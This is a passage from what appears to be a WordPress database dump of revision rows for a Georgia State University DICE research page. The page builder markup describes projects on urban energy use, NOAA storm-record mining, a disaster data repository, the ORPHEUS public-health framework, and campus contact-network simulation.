hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:44:09','2023-09-29 14:44:09','',438,'https://gsudice.dataconn.net/?p=1516',0,'revision','',0),(1517,1,'2023-09-29 10:44:09','2023-09-29 14:44:09','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:44:09','2023-09-29 14:44:09','',126,'https://gsudice.dataconn.net/?p=1517',0,'revision','',0),(1523,1,'2023-09-29 10:45:09','2023-09-29 14:45:09','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:45:09','2023-09-29 14:45:09','',438,'https://gsudice.dataconn.net/?p=1523',0,'revision','',0),(1524,1,'2023-09-29 10:45:09','2023-09-29 14:45:09','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 